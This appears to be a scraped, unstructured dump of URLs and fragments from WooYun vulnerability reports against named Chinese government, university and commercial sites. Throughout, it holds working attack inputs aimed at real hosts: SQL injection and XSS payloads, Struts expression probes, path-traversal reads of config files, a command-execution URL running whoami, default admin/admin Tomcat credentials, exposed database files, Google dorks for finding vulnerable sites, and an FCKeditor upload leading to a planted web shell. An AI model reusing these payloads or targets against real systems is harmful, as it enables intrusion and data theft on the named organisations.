http://wooyun.org/bugs/wooyun-2010-068198 https://dx.9555168.com/iphone/index.html http://dx.9555168.com/page.php?id=16 http://search.js.cei.gov.cn/test.php http://search.js.cei.gov.cn http://search.js.cei.gov.cn/subeifz222/phpinfo.php http://search.js.cei.gov.cn/002_jszh/dbconfig/dbconf.inc http://search.js.cei.gov.cn/007_hd56info/admin/ http://search.js.cei.gov.cn/007_hd56info/_sql/hd56info.sql 
http://search.js.cei.gov.cn/007_hd56info/dbconfig/ http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.chnjcdc.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://115.29.234.197:8090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://119.145.194.122:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://lqcc.ustc.edu.cn/news/?column=19 http://lqcc.ustc.edu.cn/news/?column=19 http://www.lianchuang.com/ http://221.13.223.132:8086/verifycode/verifycode_create.action http://office.lianchuang.com/basic/user/validNumGenerate.action http://www.aastar.com.cn/login!validNumGenerate.action http://202.102.108.199/verifycode/verifycode_create.action http://202.102.41.105:8080/verifycode/verifycode_create.action http://202.102.108.199/systemportal/index.jsp http://www.iqiyi.com/u/api/relation/follow?uids=2214309904&agent_type=202&followfrm=1_0_0_0&antiCsrf=87541a9210aacd620d691b76315f0704&callback=window.Q.__callbacks__.cbvars5v http://www.iqiyi.com/u/api/relation/follow?uids=2214309904 http://erp.ikang.com/ http://59.151.25.182/ http://zsk.ikang.com/ ikang.com/123456(其实很多时候并不是没有弱口令,而是用户名不对,有了用户名大大提高了成功率) http://59.151.28.10:8100 http://59.151.28.10:8100/manager/html发现存在,测试口令admin/admin成功登录 http://profile.pengyou.com/index.php?mod=profile&u=c265e4bd629300c51fa30354d885dfcb506009baa0945719&ADTAG=TUIJIAN_HEAD&_end tel:10086 http://www.zhujiwu.com/domain/ www.pook.com http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=aaa http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=aaa http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://www.czjj.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a 
http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://www.wugang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://www.sheshantravel.com/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://61.191.41.208:9080/ http://www.dianping.com/shop/515381 www.183.gd.cn http://www.183.gd.cn http://219.159.76.60:9080/agent/ http://219.159.76.60:9080//info/maintain/frame.jsp?dsName=whinfo_ds&cityName=%CE%DF%BA%FE http://www.net137.cn/ http://www.jsytchem.com/yanjiu/sub_news.asp?id=153 http://www.jiehechina.com/newshow1.asp?id=66 http://www.daban-japan.cn/newshow1.asp?id=40 http://www.lhzyhj.com/newshow1.asp?id=113 http://www.sdydgc.cn/temp.asp?id=31 http://www.sapphireed.com/cooshow.asp?id=438 http://www.yxgedeng.com/pro_show.asp?id=131 http://tjhonglin.com/pro_show.asp?id=142 http://www.hongyouhg.com/pro_show.asp?id=317 http://www.czdsgl.com/pro_show.asp?id=100 http://www.zhongxinjingji.com/newshow1.asp?id=200 http://www.czjodt.com/pro_show.asp?id=146 http://www.hrnd.cn/sub_news1.asp?id=134 http://www.czwzy.com/pro_show.asp?id=188 http://www.yihuaoffice.com/news_veiw.aspx?tb=h&id=3 http://www.liliping.com/sub_news.asp?id=108 http://yangbo.cn/ItemView.aspx?id=14 http://www.szsdzsg.com/pro_show.asp?id=710 http://www.sunputech.com/sub_news.asp?id=173&lx=1 http://czpuhe.com/sub_news.asp?id=182&lx=1 http://www.czjyyfs.com/pro_show.asp?id=833 http://www.bxwl.com.cn/news.asp?id=154&show=yes http://www.cztengtuo.com/pro_show.asp?id=200 http://www.czdingwang.cn/pro_show.asp?id=16&title=%F6%F9%D3%E3%BC%D0 http://www.jwxxedu.com/newsXI.aspx?id=1339 http://www.lyhxbx.com/sub_news.asp?id=280&lx=2 http://www.zgxysj.cn/web_html_list_show.asp?id=2375&cid=5 http://www.jmzhongye.com/ http://xzm.ikang.com/news_article.php?id=1 http://cdhzb.ikang.com/news_article.php?id=1 http://youth.whut.edu.cn/newcity/manage/login.aspx http://www.hxdi.com/ http://www.hxdi.com/phpmyadmin/ http://www.datangmobile.cn/ 
http://219.142.67.31/Search.aspx?KeyWords=12 http://***.qzone.qq.com http://www.huakaishi.com/index.action http://58.59.39.44:8888/site/Public/ShowInfo.aspx?id=180 http://123.233.247.157:90/site/Public/ShowInfo.aspx?id=716144 http://www.shanxiga.gov.cn http://www.ycgabmfw.gov.cn http://www.dtgabmfw.gov.cn http://58.59.39.44:8888/site/Public/ShowInfo.aspx?id=180 http://123.233.247.157:90/site/Public/ShowInfo.aspx?id=716144 http://www.bzga.gov.cn/site/Public/ShowInfo.aspx?i http://www.tbqjx.com/hzgg.php http://www.zjptcc.com/ http://www.zjptcc.com/customer.asp?type=article&id=C0001 http://60.170.103.21:81/ http://221.1.218.166:81/ http://www.zixilib.com:8008/ http://ggg.360elib.com/ http://www.tsqtsg.cn:88/ http://60.222.239.237:81/ http://dydl.dylib.gov.cn/ http://zslib.org:8000/ http://120.194.7.10:8087/ http://114.104.156.250/ http://book.gyxtsg.org/ http://60.170.103.21:81/BookDetail.aspx?id=23045 http://60.170.103.21:81/VideoDetail.aspx?id=17367 http://221.1.218.166:81/BookDetail.aspx?id=147995 http://www.zixilib.com:8008/BookDetail.aspx?id=58260 http://www.zixilib.com:8008/VideoDetail.aspx?id=16 http://www.zixilib.com:8008/Bidu_Books.aspx?id=xx http://www.zixilib.com:8008/BookDetail.aspx?id=58260 http://www.zixilib.com:8008/VideoDetail.aspx?id=42 http://www.zixilib.com:8008/Download.aspx?id=22026 inurl:info_show.asp?num= http://www.hzxhgb.com/info_show.asp?num=239 http://www.yxgtj.net/info_show.asp?num=294 http://www.xxgtj.com/info_show.asp?num=508 http://www.yxgtj.net/info_show.asp?num=359 http://www.hzkfqedu.com/info_show.asp?num=566 http://www.mxwhc.com/info_show.asp?num=37 http://www.sxgdpm.com/info_show.asp?num=31 http://www.dhtyhotel.com/info_show.asp?num=254 http://www.hzdzdd.cn/info_show.asp?num=567 http://www.htqzgh.com/info_show.asp?num=525 http://cqhnb.ikang.com/news_article.php?id=1 http://hnchangning.gov.cn/build/rkj/index.html http://www.newsanli.com/ http://www.hnyyxs.com/ http://www.cs6zhong.com/index.html 
http://hnchangning.gov.cn/build/kxjs/index.html http://www.cscxcw.com/ http://www.hnlsdz.com/list.aspx?colid=1 http://www.wztrq.com/yyt.aspx http://221.204.238.109:7001/enpadmin/login.action?redirect:${2*2 http://60.13.0.172:7001/enpadmin/login.action?redirect:${2*2 http://fagao.cdpf.org.cn/enpadmin/login.action?redirect:${2*2 http://122.224.215.7:7001/enpadmin/login.action?redirect:${2*2 http://122.225.48.18:7001/enpadmin/login.action?redirect:${2*2 http://sax.sina.com.cn/mfp/click?type=3&t=MjAxNC0wOC0yOCAxMDozNjozOQkyMjIuNDEuMTcwLjY2CV9fMjIyLjQxLjE3MC42Nl8xNDA5MTkzMzE4XzAuMTg5OTQxMDAJaHR0cDovL25ld3Muc2luYS5jbj9zYT10MTI0ZDEyNjY0NTA3djcxJmRvbWFpbj12aWRlby5zaW5hLmNvbS5jbiZ3bT00MDA3JnZ0PTQJUERQUzAwMDAwMDAyMTA3MglmNjUzNTQzMC1hZGQyLTRhNTYtYTEwYy0zZTc1NjQ5NjQ3YzcJMzI3ODZFQ0JBQjc0CTMyNzg2RUNCQUI3NAktCS0JMzIzMDAwfDMyMzAwMQkzMjc4NkVDQkFCNzQJTkIxNDAzMDUyNQkJMzI3ODZFQ0JBQjc0CVdBUAktCTUzCS0JLQktCS0JLQktCS0JLQk0&url=http%3a%2f%2faris.dbqzj.net%2fis-howell&vt=4&wm=4007 http://sax.sina.com.cn/mfp/click http://xss1test.qzone.qq.com&wm=4007 http://59.151.27.4/ data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVuIik8L3NjcmlwdD4= zb.muc.edu.cn/svlcontent?action=FETCH_CONTENT&content_id=65 http://www.wowsai.com/index.php?app=user&uid=1007913 http://www.seotcs.com/ http://www.seotcs.com/seo/base.action http://www.jsgyrc.gov.cn/main/conn.asp http://www.jsgyrc.gov.cn/rczx/cx.asp http://xiangyouhui.cn/news/linknews/id/251745 http://staticlive.douyutv.com/robots.txt http://staticlive.douyutv.com/index.php inurl:/windsmake/manager_login.asp http://www.btoe.cn/jingdiananli.html http://mec.ikang.com/index1.php?city=0010&Action=Operator&hospid=085 http://mec.ikang.com/index1.php?Action=Operator&city=&hospid=1 http://www.aybm.cn/index_v.aspx页面 http://www.553.com/这个网站接口没有限制,账号体系和主站是同一个 http://www.553.com http://login.gaitu.com http://job.ehuatai.com/hr/cms/web/preview1.jsp?TID=20060521190232014432360 http://ea.ehuatai.com/jsp/actions/htWelcomeAction_chanPin 
http://shop.ehuatai.com/isale/actions/isaleMemberAction-gotoChange.action http://agt.ehuatai.com/Activation/Introduce.aspx?type=1 http://219.141.242.41/AAQuery/ http://219.141.242.41/nonautoQuery/login.aspx http://agt.ehuatai.com/ http://202.108.103.150/activation/smss.aspx http://service.ehuatai.com/jmx-console/ http://chk.ehuatai.com/htsys/loginAction.do?method=init http://211.151.82.170/m_admin/ http://360.zhiye.com/Portal/Account/Login?returnUrl=http://www.baidu.com http://anxiang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini http://www.wugang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/web.xml http://www.godeyes.cn/ http://news.godeyes.cn/extend/publish/inputer.aspx?inputer=%E4%B8%80%E7%AC%91%E5%A4%A9%E6%B6%AF http://116.11.253.25/portal/ http://international.hfut.edu.cn/content_view.php?ID=861 http://rsc.neuq.edu.cn/show.asp?id=237 www.east-port.cn URL:http://www.east-port.cn/flash_upload.php?modelid=11 http://www.sbl365.com/ http://www.sbl365.com/search/View.aspx?id=544615 http://music.google.cn/search?q=inurl:policylaw/policylaw.do&newwindow=1&filter=0 http://music.google.cn/search?q=inurl:index/index.do%3Fact%3Dindex&newwindow=1&filter=0 http://dldxdt.com http://dlahcw.com http://dlhengying.com/ http://huitongfuzhong.com/ http://www.xinmeisheying.com http://www.dljgrl.com http://www.dlxlgs.com http://www.dljyg.com http://www.dlbaina.com http://www.dlmeiou.com/ http://www.zhonghengxin.com/web/txt.php?id=111 http://www.dlbhsc.com/web/proLook.php?id=81 http://www.dltank.com/web/newsLook.php?id=150 http://xxgk.qingzhou.gov.cn/xxgk/workflow/objectbox/selectx_search.jsp?spell=xxgk http://58.40.126.130/ http://www.baidu.com/#ie=utf-8&f=8&tn=baidu&wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%AE%89%E5%BA%86%E5%A3%B9%E7%82%B9&pn=140&oq=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%AE%89%E5%BA%86%E5%A3%B9%E7%82%B9 
http://www.wjsj.gov.cn/list/index.php?zlm=700&ty=706 http://www.wjsj.gov.cn/include/web_content.php?id=71757 http://www.wjyt.gov.cn/list/index.php?pid=311 http://www.wjyt.gov.cn/include/web_content.php?id=80802 http://www.wjrsj.gov.cn/list/index.php?zlm=786&ty=793 http://www.wjrsj.gov.cn/list/video.php?zlm=784&ty=3 http://www.wjxcg.cn/include/web_content.php?id=76625 http://www.wjxcg.cn/vote/result_view.php?id=37 http://www.wjxcg.cn/list/index.php?ty=1871 http://www.wjmzj.gov.cn/list/index.php?pid=570 http://www.wjmzj.gov.cn/include/web_content.php?id=75396 http://www.wjmzj.gov.cn/list/index.php?pid=2366&ty=2366 http://www.wjxjt.gov.cn/list/message.php?ty=45 http://www.wjcl.gov.cn/include/web_content.php?id=78246 http://www.wjcl.gov.cn/list/index.php?pid=152 http://www.wjcl.gov.cn/list/picnews.php?pid=154&ty=167 http://www.wjlsj.gov.cn/include/web_content.php?id=80832 http://www.wjlsj.gov.cn/list/index.php?pid=1101 http://www.wjxtjj.gov.cn/include/web_content.php?id=80482 http://www.wjxtjj.gov.cn/list/index.php?zlm=1886& http://www.wjlzw.gov.cn/include/web_content.php?id=2038 http://www.wjlzw.gov.cn/per_build/index.php?zlm=7&ty=27 http://www.wjzbcg.gov.cn/info/?zlm=2075&ty=2083 http://wjga.wangjiang.gov.cn/include/web_content.php?id=80740 http://wjga.wangjiang.gov.cn/list/index.php?zlm=1613 http://wjga.wangjiang.gov.cn/list/inter.php?zlm=517&ty=1642 http://wjbz.wangjiang.gov.cn/include/web_content.php?id=80008 http://wjbz.wangjiang.gov.cn/list/index.php?pid=1221 http://www.sme.gov.cn/web/ylc/index.html http://www.sdaxue.com/report/custom.html http://taobaoseller.ikang.com/buy.php?mobile=13888888888(mobile参数其实是post提交的,其实不影响,放到url中也一样,问题参数在packid) http://i.cnzz.com/main.php?c=findpwd&a=modifypwd&checknum=b98925768cb6bf127846056d86[马赛克]&id=[马赛克]656&tmp=4840268a511ba2e&sendtype=email http://202.121.183.55:8000/SoftWarer/ThirdLevel/index.asp?CODE=cad_2006_ch&SLEVEL=L http://202.121.183.55:8000/SoftWarer/ThirdLevel/index.asp?CODE=cad_2006_ch&SLEVEL=L 
http://202.195.60.180/SoftWarer/ThirdLevel/index.asp?CODE=cad_2006_ch http://www.51.la/report/3_last.asp?id=14975938 http://www.51.la/report/1_main.asp?id=14925938 URL:http://www.sky.hunan.gov.cn/shownews.asp?id=6196 http://www.wowsai.com/log.txt codehttp://2014.sd.gov.cn/module/classification/dicsearch/depsearch.jsp http://2014.sd.gov.cn/module/classification/dicsearch/govsearch.jsp http://passport.csdn.net/account/login?from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://news.csdn.net/article_preview.html?preview=1&reload=1&arcid=2821118%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://passport.csdn.net/account/login?from=http%3A%2F%2Fdownload.csdn.net%2Fmy%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://passport.csdn.net/account/fpwd?action=forgotpassword&service=http://www.csdn.net/%20service=http://www.csdn.net/%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://special.csdn.net/bdclive/index.html/2?regionid=1455%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://passport.csdn.net/account/fpwd?action=forgotpassword&from=http%3A%2F%2Fjob.csdn.net%2Fcsdn%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://passport.csdn.net/account/login?from=http%3A%2F%2Fnews.csdn.net%2Farticle%2F2014-08-27%2F2821403-the-top-9-of-ali-bigdata-competition%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.zzyg.lss.gov.cn/glbm/ inurl:ShowGGTZ.asp?GGTZID= http://rkk.cdpf.org.cn/ http://zhang.591hx.com/Test/ShowArticle.aspx?oid=1 http://vip.591hx.com/history/hx_hangyezixunlist.aspx?mydate=06-29 http://game.weibo.com/wlt http://www.yqmz.gov.cn/list.aspx?kindid=505 http://www.yqtz.org/shownews.asp?id=2150 http://www.yqtz.org/news.asp?type=3 http://www.yqwqw.com/news.asp?lm_id=12&btype_id=86 http://www.yqwqw.com/qqdc/index.asp?lm_id=38&btype_id=210 http://www.fdayq.gov.cn/yyzs_show.asp?id=389 http://www.fdayq.gov.cn/gzwj.asp?classid=1 
http://www.fdayq.gov.cn/notice_show.asp?id=618 http://www.fdayq.gov.cn/zcfg.asp?classid=1 http://www.fdayq.gov.cn/notice_show1.asp?id=367 http://www.fdayq.gov.cn/gz_show.asp?id=556 http://www.fdayq.gov.cn/yyxzs_show.asp?id=607 http://www.fdayq.gov.cn/fg_show.asp?id=68 http://www.lib.sxu.edu.cn/files.jsp?ID=4 http://health.ciming.com/loginMessage.action http://yjsc.ylsy.edu.cn/news.asp?id=56 http://www.hnjcs.com/ http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17 http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%201=1%20and%20'1'='1 http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%201=2%20and%20'1'='1 http://xwb.nuc.edu.cn http://xwb.nuc.edu.cn/ss.asp?nr=hello http://portal.hzbq.gov.cn/web-console/ http://portal.hzbq.gov.cn/console/jsp_info.jsp?cmd=whoami http://portal.hzbq.gov.cn/console/mtc.jsp http://www.bestv.com.cn/index.php?m=content&c=index&a=lists&catid=27&modelid=11&platform=1 http://www.bestv.com.cn/phpsso_server/index.php?m=admin&c=login&a=init&forward= www.yueyang.gov.cn/tp/Manage/DataBase/Db.mdb http://www.xwgk.sdu.edu.cn/show.php?id=100%20and%201=2%20union%20select%201,database%28%29,3,4,5,6,user%28%29,8,9,10,version%28%29,12,13,14,15 http://shxq.cumtb.edu.cn http://mall.nbcb.com.cn/order_users.php?act=info_user&order_id=这里是任意数字 http://weibo.cn/nbcbmall这是他们的官方的微博 http://mall.nbcb.com.cn客服热线:4000096528温馨提示:我们已经支持所有银联卡支付,为您带来更好的线上支付体验! 
http://202.98.116.80/crmrpt/login.aspx http://xueyuan.weibo.com/teacher/allteacher?page=1&level=&order_field=0&order=desc,if%28%281=1%29,1,%28select%201%20union%20select%202%29%29%20desc http://xueyuan.weibo.com/myschool/index?page=1&order_field=1&order=desc https://ops.tudou.com/wp https://blog.ops.tudou.com/wp/?author=*遍历即可 http://ops.tudou.com/usvn/svn/ http://60.18.131.131//lntu/aao_52/index.jsp?curformat=d&curid=10498&depfid=5986&depfname=教学研究与质量科&fid=10498(fid参数过滤不严) http://www.nt-golf.cn/heart/pic_show1.asp?product_ID=126 http://www.nt-golf.cn/heart/news_show.asp?news_ID=315 http://www.nt-golf.cn/golf/gqnews_show.asp?news_ID=288 http://www.authenticmarine.com/news_show.asp?news_ID=37 http://www.banghaocity.com/pic_show.asp?product_ID=38 http://www.banghaocity.com/hynews_show.asp?news_ID=582 http://www.nthzsyy.com/news_show.asp?news_ID=159 http://www.msmtextile.com/pic_show.asp?product_ID=92 http://www.msmtextile.com/news_show.asp?news_ID=314 http://www.xinglu.net.cn/pic_show.asp?product_ID=20 http://www.xinglu.net.cn/news_show.asp?news_ID=310 http://www.piset.com.cn/new2_show.asp?news_ID=160 http://www.piset.com.cn/Police%20gear1.asp?product_ID=14 http://www.yuputyn.com/news_tynkp.asp?news_ID=417 http://www.yuputyn.com/hynews_show.asp?news_ID=446 http://www.yuputyn.com/news_show.asp?news_ID=443 http://www.njunt.com/news_show.asp?news_ID=376 http://www.njunt.com/ggnews_show.asp?news_ID=364 http://www.xwmy168.com/news_show.asp?news_ID=415 http://www.xwmy168.com/bynews_show.asp?news_ID=411 http://www.xwmy168.com/pic_show.asp?product_ID=38 http://www.xwmy168.com/bynews_show_en.asp?news_ID=411 http://www.zhzzf.gov.cn/mlzh.aspx?p=1 http://www.zhzzf.gov.cn/pazh.aspx?p=1 http://www.sunhel.com/en/product/pic_show.asp?product_ID=152 http://www.sunhel.com/en/news/news_view.asp?news_ID=326 http://www.nthyqh.com/news/yeneizixun_detail.asp?news_ID=155 http://www.nthyqh.com/fengcai/fengcai-detail.asp?product_ID=5 http://www.china-wxoptics.cn/pic_show.asp?product_ID=233 
http://www.china-wxoptics.cn/news_show.asp?news_ID=211 http://www.china-wxoptics.cn/news_show_en.asp?news_ID=211 http://www.ntwynf.com/news_show.asp?news_ID=103 http://www.ntwynf.com/product_show.asp?product_ID=486 http://www.ntjcjx.cn/news_show.asp?news_ID=78 http://www.ntjcjx.cn/product_show.asp?product_ID=24 http://www.lxgzc.com/aboutus/product_show.asp?product_ID=558 http://www.lxgzc.com/aboutus/news_show.asp?news_ID=464 http://oukai.njunt.com/news_show.asp?news_ID=275 http://oukai.njunt.com/ggnews_show.asp?news_ID=258 http://oukai.njunt.com/fwnews_show.asp?news_ID=236 http://www.ntexcel.cn/pic_show.asp?product_ID=90 http://www.ntexcel.cn/news_show.asp?news_ID=341 http://www.ntcaige.com/pic_show.asp?product_ID=90 http://www.ntcaige.com/news_show.asp?news_ID=362 http://xss.re/api-5946.jpg基础认准钓鱼,在背景图片上传那里,上次以后burp拦截保存的数据包,修改图片地址就OK了 http://open.tuniu.com/ http://open.tuniu.com/search?departDate=x%22%20onmouseover%3dalert%28%29%20x=%22&destination=%E6%B3%B0%E5%9B%BD&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?departDate=11&destination=x%20%22onmouseover=alert%28%29%20x=%22&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=\&departDate=&destination=&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1%27&destination=&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1%27&duration=&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1%27&promotionPrice=&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1&promotionPrice=1%27&travelType= http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1&promotionPrice=1&travelType=1%27 http://open.tuniu.com/search?currentPage=1&departDate=1&destination=1&duration=1&promotionPrice=1&travelType=1%27 http://www.zyxlkz.gov.cn/newsView.aspx?oid=8&tid=0&id=436 
http://www.zyxlkz.gov.cn/aboutUs.aspx?oid=1 http://www.zyxlkz.gov.cn/news.aspx?oid=1&tid=2 http://www.zyxlkz.gov.cn/newsPic.aspx?oid=2&tid=6 http://www.zyxlkz.gov.cn/gbook.aspx?oid=9&tid=23 http://zunyirc.cn/newsView.aspx?oid=12&tid=0&id=592 http://www.gzqyf.com/newsView.aspx?oid=13&tid=10&id=152 http://www.gzztgs.com/newsView.aspx?oid=6&tid=0&id=5 http://www.gzsjjy.net/newsView.aspx?oid=10&tid=0&id=354 http://www.zyblxx.com/newsView.aspx?oid=2&tid=5&id=357 http://www.rhsmtgz.com/newsView.aspx?oid=2&tid=34&id=488 http://www.syxzyy.com/newsView.aspx?oid=4&tid=9&id=60 http://www.lzchaye.com/newsView.aspx?oid=3&tid=0&id=174 http://114.135.10.227:85/newsView.aspx?oid=7&tid=31&id=463 http://www.gzyhg.com/newsView.aspx?oid=2&tid=1&id=1318 http://www.zaxls.com/newsView.aspx?oid=13&tid=39&id=584 http://www.zyrbc.com/newsView.aspx?oid=4&tid=8&id=473 http://www.mtrdb.gov.cn/newsView.aspx?oid=15&tid=29&id=567 http://www.bjzj.gov.cn/newsView.aspx?oid=1&tid=3&id=912 http://www.csscg.com.cn/newsView.aspx?oid=3&tid=6&id=437 http://www.bjszxxz.cn/newsView.aspx?oid=2&tid=26&id=403 http://www.zyxhyj.com/newsView.aspx?oid=6&tid=26&id=451 http://www.gzgsyjc.com/newsView.aspx?oid=6&tid=0&id=319 http://www.gzflof.com/newsView.aspx?oid=3&tid=10&id=201 http://www.zyxdqzx.com/newsView.aspx?oid=4&tid=6&id=113 http://zylxxsp.com/newsView.aspx?oid=1&tid=10&id=177 http://www.csbz.org/newsView.aspx?oid=8&tid=0&id=180 http://gzysljj.com/newsView.aspx?oid=5&tid=26&id=192 http://www.zgldmz.cn/newsView.aspx?oid=1&tid=9&id=121 http://www.yqxaxzx.com/newsView.aspx?oid=2&tid=2&id=731 http://bjszxxz.cn/newsView.aspx?oid=2&tid=6&id=465 http://www.mtxqxj.com/newsView.aspx?oid=2&tid=1&id=565 http://www.zywzjt.cn/newsView.aspx?oid=2&tid=15&id=160 http://jatoo.com.cn/newsView.aspx?oid=3&tid=13&id=38 http://jiazheng.zy96169.com/newsView.aspx?oid=2&tid=16&id=113 http://qz77.cn/newsView.aspx?oid=2&tid=12&id=109 http://www.hhgrd.gov.cn/newsView.aspx?oid=5&tid=23&id=339 
http://csscg.com.cn/newsView.aspx?oid=4&tid=8&id=426 http://zyrbc.com/newsView.aspx?oid=4&tid=8&id=472 http://114.135.10.227:85/newsView.aspx?oid=7&ti http://www.cltt.org/pscmweb/Login.aspx http://gzkyz.handtrip.com/blog/my/module/news/ViewNews.jsp?blog_id=gzkyz&NewsId=351 http://118.85.207.74:8080/Login.jsp http://www.d3.com.cn/ http://weibo.com/jackyhuang168 http://www.qdlly.com/users/Checkucname.php?username= http://www.qdlly.com/users/resetpassword.php?dopost=getmb&username= http://www.wowsai.com/ www.wowsai.com http://manager.zjszmz.cn:8089 http://210.21.223.40/index.gch# android:versionCode="5730 android:versionName="5.7.3.0 http://drops.wooyun.org/papers/548 http://edu.teacher.com.cn/onlinere/youyu.jsp jar:/data/jdk/lib/tools.jar server:/data/jdk/jre/lib/amd64:/data/jdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/lib:/usr/lib http://java.sun.com/ http://kaixue.izhikang.com/admin.php,某活动的管理系统。 android:versionCode="5730 android:versionName="5.7.3.0 android:name="com.wuba.android.lib.util.commons.SharedPreferencesProvider android:authorities="com.wuba.android.provider.preference android:name="com.wuba.databaseprovider.AreaDBProvider android:authorities="com.wuba.android.provider.area android:name="com.wuba.thirdapps.kuaidi100.provider.ExpressHisProvider android:authorities="com.wuba.android.plugins.provider.KUAIDI100 android:name="com.wuba.im.IMChatProvider android:process=":downloadapkservice android:authorities="com.wuba.hybrid.chat android:name="com.wuba.databaseprovider.InquiryDBUpdateInBgProvider android:process=":downloadapkservice android:authorities="com.wuba.android.provider.data android:name="com.wuba.databaseprovider.UserActionDBProvider android:process=":downloadapkservice android:authorities="com.wuba.android.provider.useraction http://ca.ufida.com.cn:8080/user-ad/index.do http://jncc.nuaa.edu.cn/ http://jncc.nuaa.edu.cn/upload http://jncc.nuaa.edu.cn/plus/ http://jncc.nuaa.edu.cn/data/geili.php 
http://csjsxy.tjbys.com/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://bhzyxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://nkdxbhxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://hyzyxy.tjedu.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://zjxy.tjbys.net/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://bhzyjsxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://msxy.tjedu.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector url:http://bhzyxy.tjbys.com.cn/jobsys/user/reset.jsp)为例进行说明: http://bhzyxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector新建test目录并直接上传一句话至test目录 http://bhzyxy.tjbys.com.cn/jobsys/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/Image/test/ http://bhzyxy.tjbys.com.cn/jobsys/UserFiles//Image/test/adminjsp.jsp http://218.196.240.120/list.aspx?id=165 http://202.98.116.80/luojihao/login.aspx http://vahhvahh.i.sohu.com/ http://oa.hzuf.com:9090/sys/sortListUI.jsp?searchKeyvalue=8 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.shunhengli.com:9090/witapprovemanage/report/comReimburse.jsp?comid=1 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://oa.hzuf.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 
http://oa.chnjcdc.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://115.29.234.197:8090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://119.145.194.122:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 http://www.ahwlh.com/page.php?act=news&id=24&idd=504 http://hbdjfy.gov.cn/page.php?act=shenwu&id=74&idd=3633 http://www.hbsjsbyy.com/page.php?act=news&id=22&idd=526 http://www.weishuiyuannongye.com/page.php?act=news&id=24&idd=2991 http://www.huaibeiyuxin.com/page.php?act=news&id=22&idd=414 http://www.zhongkangyuan.net/page.php?act=case&id=19&idd=162 http://www.boxinkemao.com/page.php?act=news&id=37&idd=399 http://www.ahhzjt.com/page.php?act=news&id=33&idd=623 http://www.xxkjxx.com/page.php?act=news&id=26&idd=473 http://www.jinsexitang.com/page.php?act=layout&id=49&idd=542 http://www.yshsjd.com/page.php?act=news&id=32&idd=993 